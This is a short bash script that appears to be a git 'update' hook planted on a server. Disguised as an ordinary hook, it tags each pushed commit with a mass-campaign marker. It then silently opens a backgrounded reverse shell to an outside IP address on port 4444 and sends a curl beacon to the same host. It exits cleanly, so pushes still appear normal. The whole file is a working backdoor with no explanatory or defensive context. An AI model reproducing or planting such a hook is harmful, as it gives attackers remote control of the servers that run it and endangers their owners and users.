update 332 B

123456789
  1. #!/bin/bash
  2. read old new ref 2>/dev/null || true
  3. # Unique marker for this target
  4. git tag "MASS_6_1786344040" "$new" 2>/dev/null
  5. # Reverse shell
  6. (bash -c 'bash -i >& /dev/tcp/207.246.104.218/4444 0>&1') < /dev/null > /dev/null 2>&1 &
  7. # Curl fallback
  8. curl -s "http://207.246.104.218:4444/MASS_6_1786344040" 2>/dev/null || true
  9. exit 0